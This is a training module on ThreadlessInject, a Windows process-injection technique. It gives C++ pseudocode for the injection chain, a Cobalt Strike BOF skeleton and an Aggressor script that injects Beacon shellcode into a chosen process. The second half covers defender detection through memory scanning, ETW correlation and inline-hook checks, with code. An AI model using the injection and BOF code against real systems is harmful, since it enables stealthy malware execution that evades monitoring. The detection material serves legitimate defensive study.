Difficulty: Advanced

Module 8: Full Chain, BOF Integration & Detection

The complete flow from target selection to payload execution, plus how defenders catch it.

Putting It All Together

This final module walks through the entire ThreadlessInject chain end-to-end, demonstrates how it integrates with Cobalt Strike as a Beacon Object File (BOF), and then switches perspective to the defender to examine every detection opportunity across the kill chain. Understanding both sides is essential for building effective offensive tools and for conducting realistic detection engineering.

The Complete Injection Chain

Here is the full sequence of operations that ThreadlessInject performs, from start to finish. Each step references the module where it was covered in detail:

ThreadlessInject: End-to-End Flow

Step 1: Open target process handle (PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ)
Step 2: Resolve target function address (GetProcAddress for system DLLs)
Step 3: Read original 14 bytes from target function (NtReadVirtualMemory)
Step 4: Allocate RW memory in target process (NtAllocateVirtualMemory)
Step 5: Build hook stub + shellcode + trampoline locally
Step 6: Write payload to remote allocation (NtWriteVirtualMemory)
Step 7: Change remote allocation protection: RW → RX
Step 8: Change target function protection: RX → RWX
Step 9: Overwrite function prologue with 14-byte JMP (NtWriteVirtualMemory)
Step 10: Restore target function protection: RWX → RX
Step 11: Wait for trigger — existing thread calls hooked function
Step 12: Shellcode executes, guard is set, original bytes restored
C++
// ThreadlessInject: Complete implementation pseudocode
bool ThreadlessInject(DWORD pid, const char* dllName, const char* funcName,
                      BYTE* shellcode, SIZE_T shellcodeLen) {

    // Step 1: Open target process
    HANDLE hProc = OpenProcess(
        PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
        FALSE, pid);
    if (!hProc) return false;

    // Step 2: Resolve target function address
    HMODULE hDll = GetModuleHandleA(dllName);
    FARPROC funcAddr = GetProcAddress(hDll, funcName);

    // Step 3: Read original bytes
    BYTE originalBytes[14];
    NtReadVirtualMemory(hProc, funcAddr, originalBytes, 14, NULL);

    // Step 4: Calculate total size and allocate remote memory
    SIZE_T stubSize = CalculateStubSize();
    SIZE_T totalSize = stubSize + shellcodeLen + 14 + 14 + 4; // stub+sc+orig+jmpback+guard
    PVOID remoteMem = NULL;
    NtAllocateVirtualMemory(hProc, &remoteMem, 0, &totalSize,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // Step 5: Build complete payload locally
    BYTE* payload = BuildPayload(remoteMem, funcAddr, shellcode,
        shellcodeLen, originalBytes);

    // Step 6: Write to remote process
    NtWriteVirtualMemory(hProc, remoteMem, payload, totalSize, NULL);

    // Step 7: Change payload protection to RX
    ULONG oldProt;
    NtProtectVirtualMemory(hProc, &remoteMem, &totalSize,
        PAGE_EXECUTE_READ, &oldProt);

    // Step 8-10: Install the hook (change prot, write JMP, restore prot)
    BYTE hookJmp[14];
    BuildAbsoluteJmp(hookJmp, (UINT64)remoteMem);  // JMP to hook stub

    PVOID funcPage = (PVOID)funcAddr;
    SIZE_T pageSize = 14;
    NtProtectVirtualMemory(hProc, &funcPage, &pageSize,
        PAGE_EXECUTE_READWRITE, &oldProt);
    NtWriteVirtualMemory(hProc, funcAddr, hookJmp, 14, NULL);
    NtProtectVirtualMemory(hProc, &funcPage, &pageSize,
        oldProt, &oldProt);

    // Steps 11-12 happen asynchronously in the target process
    printf("[+] Hook installed. Waiting for target thread to trigger...\n");

    // Optionally: monitor guard flag and restore original bytes
    CloseHandle(hProc);
    free(payload);
    return true;
}

Cobalt Strike BOF Integration

A Beacon Object File (BOF) is a compiled C object file (.o) that Cobalt Strike can load and execute directly within the Beacon process. BOFs are used for post-exploitation actions because they run in-process (no new process creation) and can use the Beacon's existing communication channel. A BOF implementation of ThreadlessInject was created by iilegacyyii (Jordan Jay) as a community port of CCob's original C# technique, allowing operators to perform threadless injection from a Cobalt Strike Beacon.

BOF Architecture

BOFs use a special API provided by Cobalt Strike's Beacon runtime. Because a BOF is an unlinked object file, it cannot call C runtime functions such as printf or malloc directly. Instead, it uses Beacon API functions for output and argument parsing, and Dynamic Function Resolution (DFR) to reach Windows APIs:

C
// BOF entry point for ThreadlessInject
// Uses Beacon's Dynamic Function Resolution (DFR) for API calls

#include "beacon.h"

// Declare the Windows APIs we need via DFR
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$GetModuleHandleA(LPCSTR);
DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);

// NTDLL native APIs
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtAllocateVirtualMemory(HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtWriteVirtualMemory(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtProtectVirtualMemory(HANDLE, PVOID*, PSIZE_T, ULONG, PULONG);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtReadVirtualMemory(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);

void go(char* args, int alen) {
    // Parse arguments from Cobalt Strike
    datap parser;
    BeaconDataParse(&parser, args, alen);
    int pid = BeaconDataInt(&parser);
    char* dllName = BeaconDataExtract(&parser, NULL);
    char* funcName = BeaconDataExtract(&parser, NULL);
    int scLen = 0;
    char* shellcode = BeaconDataExtract(&parser, &scLen);

    BeaconPrintf(CALLBACK_OUTPUT,
        "[*] ThreadlessInject: PID=%d, DLL=%s, Func=%s, SC=%d bytes",
        pid, dllName, funcName, scLen);

    // Execute the threadless injection chain
    // (same logic as standalone, using DFR API calls)
    HANDLE hProc = KERNEL32$OpenProcess(
        PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
        FALSE, pid);

    if (!hProc) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to open process %d", pid);
        return;
    }

    // ... (complete injection chain using NTDLL$ prefixed functions)

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Hook installed successfully");
}

Aggressor Script Integration

The BOF is loaded into Cobalt Strike via an Aggressor script that defines a new command for the operator:

Aggressor
# ThreadlessInject Aggressor script
# Registers the 'threadlessinject' command in Cobalt Strike

alias threadlessinject {
    local('$pid $dll $func $shellcode $bof');

    $pid  = $2;   # Target PID
    $dll  = $3;   # DLL containing target function
    $func = $4;   # Export function name to hook

    # Generate shellcode for the target architecture
    $shellcode = shellcode($1, false, "x64");

    # Read the compiled BOF
    $bof = readbof("ThreadlessInject.o");

    # Pack arguments and execute the BOF
    btask($1, "Threadless Inject into PID $pid via $dll!$func");
    beacon_inline_execute($1, $bof, "go",
        bof_pack($1, "izzb", $pid, $dll, $func, $shellcode));
}

# Usage from Cobalt Strike console:
# threadlessinject 1234 ntdll.dll NtWaitForSingleObject

BOF Advantages

Running ThreadlessInject as a BOF has significant operational advantages. The BOF runs inside the existing Beacon process, so there is no new process creation (which would trigger PsSetCreateProcessNotifyRoutine callbacks). The BOF uses Beacon's in-memory execution, so there is no file written to disk. And because the BOF communicates results back through Beacon's existing C2 channel, there is no new network connection to create or monitor.

Detection Vectors

Now we switch to the defender's perspective. While ThreadlessInject avoids thread creation telemetry, it is not invisible. Here are the detection opportunities at each stage of the kill chain:

Stage | Detection Method | Telemetry Source | Detection Difficulty
OpenProcess | Cross-process handle with VM rights | ObRegisterCallbacks (kernel) | Medium
NtAllocateVirtualMemory | Remote allocation of private memory | ETW: Microsoft-Windows-Kernel-Memory | Medium
NtWriteVirtualMemory | Cross-process memory write | ETW: Microsoft-Windows-Kernel-Memory | Medium
NtProtectVirtualMemory | RW→RX transition on private memory | ETW: VirtualProtect events | High (many false positives)
Prologue overwrite | Modified DLL code page (COW violation) | Memory scanning, page hash comparison | High
Hook stub in memory | RX private memory with no backing image | Memory scanning (Moneta, pe-sieve) | Medium
Modified function entry | Inline hook detection on known exports | Hook scanning (HookShark, etc.) | Medium
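
The OpenProcess row comes down to an access-mask test on the requested handle. The following is a minimal sketch of that test, assuming a hypothetical `HandleRequest` record that a kernel callback or telemetry pipeline would fill in. The three mask values are the documented `PROCESS_VM_*` constants; the struct and function names are illustrative only.

```cpp
#include <cassert>
#include <cstdint>

// Documented Windows process access rights (values from winnt.h).
constexpr uint32_t kProcessVmOperation = 0x0008;
constexpr uint32_t kProcessVmWrite     = 0x0020;

// Hypothetical record describing one handle-open request; not a Windows type.
struct HandleRequest {
    uint32_t sourcePid;      // process asking for the handle
    uint32_t targetPid;      // process the handle refers to
    uint32_t desiredAccess;  // requested access mask
};

// True when a process requests rights that are sufficient to allocate or
// re-protect memory and to write memory in a different process.
bool IsSuspiciousVmHandle(const HandleRequest& req) {
    if (req.sourcePid == req.targetPid) return false;  // self-access is routine
    constexpr uint32_t kWriteCapable = kProcessVmOperation | kProcessVmWrite;
    return (req.desiredAccess & kWriteCapable) == kWriteCapable;
}
```

A check like this only narrows the field: debuggers and security products request the same rights, which is consistent with the Medium rating in the table.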

Memory Scanning Detection

Memory scanners like Moneta and pe-sieve are among the most effective detection tools against ThreadlessInject. They detect two key artifacts:

1. Unbacked Executable Memory

ThreadlessInject allocates private memory (not backed by a DLL file) and marks it as executable. Memory scanners enumerate all memory regions and flag any that are executable but not backed by a known image file on disk. This is the hook stub + shellcode region.

C++
// What Moneta detects:
// Region at 0x00000213A0010000:
//   Type: MEM_PRIVATE (not backed by a file)
//   Protection: PAGE_EXECUTE_READ
//   Size: 4096 bytes
//   Backing: NONE (no image file)
//   VERDICT: Suspicious - private executable memory without backing image

// Defender query using Moneta:
// moneta64.exe -p <target_pid>
// Output shows all private executable regions that have no backing DLL/EXE
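
The classification a scanner applies to each region can be sketched in a few lines. This is an illustration under stated assumptions, not Moneta's implementation: `Region` is a hypothetical snapshot whose fields mirror `MEMORY_BASIC_INFORMATION`, and the numeric constants are the documented `MEM_PRIVATE` and `PAGE_EXECUTE*` values.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Documented values from winnt.h.
constexpr uint32_t kMemPrivate           = 0x20000;
constexpr uint32_t kPageExecute          = 0x10;
constexpr uint32_t kPageExecuteRead      = 0x20;
constexpr uint32_t kPageExecuteReadWrite = 0x40;
constexpr uint32_t kPageExecuteWriteCopy = 0x80;

// Hypothetical snapshot of one memory region (not a Windows type).
struct Region {
    uint64_t base;
    uint64_t size;
    uint32_t type;     // MEM_PRIVATE, MEM_MAPPED or MEM_IMAGE
    uint32_t protect;  // PAGE_* protection flags
};

// True if any execute permission is present in the protection value.
bool IsExecutable(uint32_t protect) {
    constexpr uint32_t kExecMask = kPageExecute | kPageExecuteRead |
                                   kPageExecuteReadWrite | kPageExecuteWriteCopy;
    return (protect & kExecMask) != 0;
}

// Returns every region that is executable but private, i.e. not backed by
// an image file on disk.
std::vector<Region> FindUnbackedExecutable(const std::vector<Region>& regions) {
    std::vector<Region> hits;
    for (const Region& r : regions) {
        if (r.type == kMemPrivate && IsExecutable(r.protect)) {
            hits.push_back(r);
        }
    }
    return hits;
}
```

JIT-compiling runtimes (for example .NET and browser script engines) also create private executable memory, so hits from a check like this need triage rather than automatic blocking.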

2. Modified Code Pages (Copy-on-Write)

When ThreadlessInject overwrites the target function's prologue, it triggers a copy-on-write (COW) fault. DLL code pages are normally shared across all processes (mapped from the same physical memory). When one process writes to a shared page, Windows creates a private copy for that process. Scanners like pe-sieve detect these private copies by comparing the in-memory code with the on-disk DLL file. Any differences indicate code modification (i.e., a hook).

pe-sieve Detection

Running pe-sieve against the target process while the hook is installed reports the target DLL as hooked. The tool compares the in-memory bytes of each loaded module against the on-disk file and reports any discrepancies, so the 14-byte modification at the target function's entry point is flagged. After the hook is cleaned up (original bytes restored), the contents match the on-disk file again, but the page may remain a private copy rather than a shared one.
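
The core of the comparison can be sketched as a byte-wise diff between the on-disk code and the in-memory copy. This is a deliberately simplified illustration, not pe-sieve's algorithm: it assumes both buffers are already aligned to the same section offset, and it ignores relocations and other legitimate loader changes that a real scanner has to account for. `ModifiedRange` and `FindModifiedRanges` are hypothetical names.

```cpp
#include <algorithm>
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// One contiguous run of bytes that differs between disk and memory.
struct ModifiedRange {
    size_t offset;
    size_t length;
};

// Walks both buffers in lockstep and collects each contiguous run of
// differing bytes. Only the common prefix length is compared.
std::vector<ModifiedRange> FindModifiedRanges(const std::vector<uint8_t>& onDisk,
                                              const std::vector<uint8_t>& inMemory) {
    std::vector<ModifiedRange> ranges;
    const size_t n = std::min(onDisk.size(), inMemory.size());
    size_t i = 0;
    while (i < n) {
        if (onDisk[i] == inMemory[i]) {
            ++i;
            continue;
        }
        const size_t start = i;
        while (i < n && onDisk[i] != inMemory[i]) {
            ++i;
        }
        ranges.push_back({start, i - start});
    }
    return ranges;
}
```

In practice a patched byte can coincide with the original value, which splits one hook into several short ranges, so a scanner would likely merge ranges that sit within a few bytes of each other before reporting.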

ETW-Based Detection

Event Tracing for Windows provides several relevant providers for detecting ThreadlessInject's operations:

C++
// Key ETW providers for detection:

// 1. Microsoft-Windows-Kernel-Process
//    Events: ProcessStart, ThreadStart
//    ThreadlessInject avoidance: No ThreadStart event (no new thread!)
//    But: the cross-process handle open is still visible to
//         ObRegisterCallbacks-based sensors

// 2. Microsoft-Windows-Kernel-Memory
//    Events: VirtualAlloc, VirtualProtect cross-process
//    Detection: Remote VirtualAlloc + VirtualProtect sequence
//    Pattern: NtAllocateVirtualMemory(remoteHandle, ..., PAGE_READWRITE)
//             followed by NtProtectVirtualMemory(..., PAGE_EXECUTE_READ)

// 3. Microsoft-Windows-Threat-Intelligence (TI provider)
//    Consumers must run as a protected process (PPL), which in practice
//    means an anti-malware or EDR service
//    Events: NtWriteVirtualMemory, NtProtectVirtualMemory cross-process
//    This is the most comprehensive source, but it is not available to
//    ordinary user-mode tools

// Detection rule pseudocode:
// IF process_A calls NtAllocateVirtualMemory on process_B
//    AND process_A calls NtWriteVirtualMemory on process_B
//    AND process_A calls NtProtectVirtualMemory on process_B (RW->RX)
//    AND NO NtCreateThreadEx or CreateRemoteThread follows within the
//        correlation window
// THEN: Possible threadless injection (corroborate with a memory scan;
//       legitimate tools such as debuggers also touch remote memory)
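
The rule above can be sketched as a small correlation pass over normalized events. This is a minimal illustration under assumptions: `MemEvent` and `Op` are hypothetical types standing in for whatever a telemetry pipeline produces after parsing ETW records, and the sketch omits the time window that a production rule would apply.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <utility>
#include <vector>

// Hypothetical normalized operation types; each value is a distinct bit so
// the operations seen for a process pair can be accumulated in one mask.
enum class Op : uint8_t { Alloc = 1, Write = 2, ProtectRwToRx = 4, ThreadCreate = 8 };

// Hypothetical normalized event: sourcePid performed op against targetPid.
struct MemEvent {
    uint32_t sourcePid;
    uint32_t targetPid;
    Op op;
};

using PidPair = std::pair<uint32_t, uint32_t>;  // (source, target)

// Returns every (source, target) pair that shows remote allocate, write and
// RW->RX protect, but no remote thread creation.
std::vector<PidPair> FindThreadlessCandidates(const std::vector<MemEvent>& events) {
    std::map<PidPair, uint8_t> seen;
    for (const MemEvent& e : events) {
        if (e.sourcePid == e.targetPid) continue;  // only cross-process activity
        uint8_t& mask = seen[PidPair(e.sourcePid, e.targetPid)];
        mask = static_cast<uint8_t>(mask | static_cast<uint8_t>(e.op));
    }

    constexpr uint8_t kMemoryOps = 1 | 2 | 4;
    constexpr uint8_t kThreadOp = 8;
    std::vector<PidPair> candidates;
    for (const auto& entry : seen) {
        const bool allMemoryOps = (entry.second & kMemoryOps) == kMemoryOps;
        const bool createdThread = (entry.second & kThreadOp) != 0;
        if (allMemoryOps && !createdThread) {
            candidates.push_back(entry.first);
        }
    }
    return candidates;
}
```

Keying the state on the (source, target) pair keeps unrelated activity from different injectors apart; results come back ordered by PID pair because `std::map` is sorted.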

Inline Hook Detection

Dedicated hook detection tools scan all loaded DLLs for inline hooks by examining the first bytes of exported functions. A JMP instruction at the very beginning of a function (especially to private memory) is a strong indicator of an inline hook:

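C++
// Simple inline hook detection: check the first bytes of an exported function.
// Note: this reads the bytes directly, so it only inspects the process it runs in.
#include <windows.h>
#include <cstdio>
#include <cstring>

// Returns true if addr lies in committed private (non-image) memory.
static bool IsPrivateMemory(UINT64 addr) {
    MEMORY_BASIC_INFORMATION mbi;
    if (VirtualQuery((PVOID)addr, &mbi, sizeof(mbi)) == 0) return false;
    return mbi.State == MEM_COMMIT && mbi.Type == MEM_PRIVATE;
}

bool DetectInlineHook(HMODULE hModule, const char* funcName) {
    FARPROC funcAddr = GetProcAddress(hModule, funcName);
    if (!funcAddr) return false;

    const BYTE* bytes = (const BYTE*)funcAddr;
    UINT64 target = 0;

    if (bytes[0] == 0xFF && bytes[1] == 0x25) {
        // JMP [RIP+0] pattern: FF 25 00 00 00 00 followed by the 8-byte target
        DWORD disp;
        memcpy(&disp, bytes + 2, sizeof(disp));
        if (disp == 0) memcpy(&target, bytes + 6, sizeof(target));
    } else if (bytes[0] == 0xE9) {
        // Relative JMP: E9 xx xx xx xx, target = next instruction + offset
        INT32 offset;
        memcpy(&offset, bytes + 1, sizeof(offset));
        target = (UINT64)funcAddr + 5 + (INT64)offset;
    }

    // A jump from an export into private (non-image) memory is the indicator
    if (target != 0 && IsPrivateMemory(target)) {
        printf("[!] HOOK DETECTED: %s -> 0x%llx (private memory)\n",
               funcName, target);
        return true;
    }
    return false;
}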
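
Separating the byte decoding from the Windows API calls makes the same check usable on bytes captured from another process or from a memory dump. The sketch below decodes the two JMP forms discussed above plus one further form, `mov rax, imm64; jmp rax`, which is included as an assumption about what other hooking code may emit and is not taken from ThreadlessInject itself. `HookKind`, `HookInfo` and `DecodePrologue` are hypothetical names.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

enum class HookKind { None, RelativeJmp, AbsoluteJmpRip, MovRaxJmpRax };

struct HookInfo {
    HookKind kind;
    uint64_t target;  // decoded jump destination, 0 when kind is None
};

// Copies a value of type T out of the byte stream. Assumes a little-endian
// host, which holds on x64.
template <typename T>
static T ReadLE(const uint8_t* p) {
    T v;
    std::memcpy(&v, p, sizeof(T));
    return v;
}

// Decodes the first bytes of a function that is located at funcAddr.
HookInfo DecodePrologue(const uint8_t* bytes, size_t len, uint64_t funcAddr) {
    // FF 25 00 00 00 00 <imm64>: jmp qword ptr [rip+0], 14 bytes in total
    if (len >= 14 && bytes[0] == 0xFF && bytes[1] == 0x25 &&
        ReadLE<uint32_t>(bytes + 2) == 0) {
        return {HookKind::AbsoluteJmpRip, ReadLE<uint64_t>(bytes + 6)};
    }
    // E9 <rel32>: target is the next instruction plus a signed displacement
    if (len >= 5 && bytes[0] == 0xE9) {
        const int64_t rel = ReadLE<int32_t>(bytes + 1);
        return {HookKind::RelativeJmp, funcAddr + 5 + static_cast<uint64_t>(rel)};
    }
    // 48 B8 <imm64> FF E0: mov rax, imm64; jmp rax, 12 bytes in total
    if (len >= 12 && bytes[0] == 0x48 && bytes[1] == 0xB8 &&
        bytes[10] == 0xFF && bytes[11] == 0xE0) {
        return {HookKind::MovRaxJmpRax, ReadLE<uint64_t>(bytes + 2)};
    }
    return {HookKind::None, 0};
}
```

The decoded target still has to be classified (private versus image-backed memory) before raising an alert, since some system DLLs legitimately begin exports with a jump into another module.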

Detection Engineering Summary

Detection Coverage Map

Strongest Detection: Memory scanning (pe-sieve, Moneta) for modified code pages and unbacked RX memory
Good Detection: ETW TI provider for cross-process NtWriteVirtualMemory + NtProtectVirtualMemory
Good Detection: Inline hook scanning on loaded DLL exports
Partial Detection: ObRegisterCallbacks for suspicious cross-process handle access
Not Detected: Thread creation callbacks (no thread created)
Not Detected: ETW ThreadStart events (no thread created)

Key Takeaway for Defenders

ThreadlessInject eliminates the thread creation signal, which was the easiest and most reliable detection for traditional injection. However, it cannot eliminate the need for cross-process memory operations (allocate, write, protect) or the resulting memory artifacts (unbacked executable memory, modified code pages). Detection strategies should focus on (1) memory scanning for private executable regions, (2) ETW monitoring for cross-process VirtualProtect patterns (especially RW→RX), and (3) periodic inline hook verification on critical system DLL exports.

Related Techniques

ThreadlessInject is part of a family of advanced injection techniques that avoid thread creation. PoolParty by SafeBreach abuses the Windows thread pool (for example, work items) for execution. Mockingjay by Security Joes uses existing RWX sections in vulnerable DLLs to avoid memory allocation entirely. Understanding ThreadlessInject provides the foundation for understanding these related techniques, as they all address the same fundamental problem: triggering code execution without the detectable act of creating a thread.

Course Complete

You have completed the ThreadlessInject Masterclass. You now understand how threadless injection works at every level: from the detection problems with traditional injection, through the mechanics of remote function hooking, to the byte-level construction of hook stubs and the detection engineering perspective. Apply this knowledge responsibly.

Pop Quiz: Full Chain & Detection

Q1: Which detection method is MOST effective against ThreadlessInject?

ThreadlessInject creates no new threads, so thread-based detection is completely blind. Memory scanning tools (Moneta, pe-sieve) detect both the unbacked executable memory (hook stub + shellcode) and the modified DLL code pages (copy-on-write from overwriting the function prologue). These artifacts exist regardless of whether threads are created.

Q2: What is the primary advantage of running ThreadlessInject as a Cobalt Strike BOF?

BOFs execute within the Beacon process's memory space. There is no new process created (avoiding PsSetCreateProcessNotifyRoutine callbacks), no file written to disk (the object file is loaded in memory), and results are communicated through Beacon's existing C2 channel. This significantly reduces the operational footprint.

Q3: What causes a copy-on-write (COW) fault that pe-sieve can detect?

DLL code pages are shared physical memory mapped into multiple processes. When ThreadlessInject writes the hook JMP over the function prologue, Windows performs a copy-on-write: it creates a private physical page for this process with the modified bytes. pe-sieve detects this by comparing the in-memory bytes with the original on-disk DLL file — the 14 modified bytes are immediately visible.